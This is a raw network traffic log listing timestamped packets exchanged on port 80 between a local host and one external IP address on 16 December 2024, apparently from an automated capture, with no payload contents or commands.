Dec 16, 2024 11:03:17.466231108 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.466279030 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.467284918 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.467365980 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.467390060 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.467441082 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.468486071 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.468503952 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.468547106 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.468575001 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.469597101 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.469671011 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.469721079 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.469768047 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.470758915 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.470789909 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.470820904 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.470839977 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.471934080 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.472034931 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.472039938 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.472079039 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.473082066 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.473134995 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.473186016 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.473227024 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.474268913 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.474286079 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.474368095 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.474368095 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.475367069 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.475421906 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.475423098 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.475481033 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.476530075 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.476577044 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.476661921 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.476705074 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.477684021 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.477731943 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.477771044 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.477813959 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.478909969 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.479027033 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.479084015 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.480006933 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.480065107 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.480103016 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.480153084 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.481170893 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.481241941 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.481331110 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.481487989 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.482284069 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.482368946 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.482387066 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.482439041 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.483441114 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.483505011 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.483602047 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.483983040 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.484627962 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.484695911 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.484746933 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.484786034 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.485802889 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.485932112 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.485999107 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.487072945 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.487158060 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.487184048 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.487240076 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.488080978 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.488145113 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.488190889 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.488245964 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.489252090 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.489319086 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.489352942 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.489531040 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.490405083 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.490470886 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.490482092 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.490516901 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.491492033 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.491549015 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.623060942 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.623150110 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.623169899 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.623241901 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.623470068 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.623526096 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.624054909 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.624113083 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.624139071 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.624234915 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.624891043 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.624953985 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.625005007 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.625072956 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.626029968 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.626090050 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.626147985 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.626215935 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.627222061 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.627285004 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.627372026 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.627428055 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.628366947 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.628423929 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.628511906 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.628566980 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.629570007 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.629630089 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.629708052 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.629765987 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.630677938 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.630742073 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.630776882 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.630826950 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.631846905 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.631902933 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.631954908 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.631980896 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.632958889 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.633023024 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.633102894 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.633157969 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.634102106 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.634162903 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.634232044 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.634288073 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.635274887 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.635332108 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.635409117 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.635467052 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.636428118 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.636487961 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.636501074 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.636554003 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.637584925 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.637641907 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.637707949 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.637763977 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.638736010 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.638792038 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.638847113 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.638897896 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.639898062 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.640006065 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.640075922 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.640130043 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.641120911 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.641177893 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.641259909 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.641314030 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.642231941 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.642287016 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.642368078 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.642425060 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.643378019 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.643436909 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.643512964 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.643568039 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.644524097 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.644582987 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.644648075 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.644714117 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.645684004 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.645744085 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.645811081 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.645879984 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.646864891 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.646924973 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.647007942 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.647063017 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.647984028 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.648037910 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.648201942 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.648260117 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.649142027 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.649197102 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.649221897 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.649279118 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.650296926 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.650357962 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.650454044 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.650509119 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.651458979 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.651516914 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.651607037 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.651660919 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.652627945 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.652678013 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.652682066 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.652734041 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.653812885 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.653868914 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.653870106 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.653918982 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.654983044 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.655047894 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.655101061 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.655193090 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.656101942 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.656151056 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.656157970 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.656198025 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.657291889 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.657345057 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.657346010 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.657391071 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.658396959 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.658509016 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.658569098 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.659539938 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.659600019 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.659672022 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.659727097 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.660808086 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.660856962 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.660877943 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.660908937 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.661854029 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.661910057 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.661915064 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.661959887 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.662997961 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.663058043 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.663125038 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.663186073 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.664165974 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.664222956 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.664287090 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.664350986 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.665316105 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.665374994 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.665517092 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.665575981 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.666512012 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.666573048 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.666619062 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.666673899 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.667640924 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.667701960 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.667834044 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.667891026 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.668802023 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.668855906 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.668859959 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.668912888 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.669930935 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.669991016 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.670054913 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.670108080 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.671119928 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.671216965 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.671281099 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.672261953 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.672328949 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.672355890 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.672410965 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.673430920 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.673491001 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.673528910 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.673583031 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.674614906 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.674674034 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.674696922 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.674751997 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.675740957 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.675796032 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.675877094 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.675928116 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.676872015 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.676933050 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.676980019 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.677033901 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.678061962 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.678117037 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.678183079 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.678232908 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.679194927 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.679230928 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.679255009 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.679280043 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.680356026 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.680392027 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.680413008 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.680452108 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.681507111 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.681607008 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.681608915 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.681655884 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.682698011 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.682810068 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.682868004 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.815478086 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.815535069 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.815689087 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.815741062 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.815910101 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.816026926 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.816046000 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.816046000 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.816112995 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.817114115 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.817152023 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.817204952 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.817204952 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.818315983 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.818352938 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.818377018 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.818407059 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.819428921 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.819506884 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.819580078 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.820585966 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.820683002 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.820705891 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.820934057 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.821712017 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.821788073 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.821796894 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.821873903 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.823019028 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.823072910 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.823121071 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.823121071 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.824055910 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.824126959 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.824165106 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.824237108 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.825212955 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.825282097 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.825391054 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.826343060 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.826447964 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.826467991 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.826548100 CET	49800	80	192.168.2.5	31.41.244.11
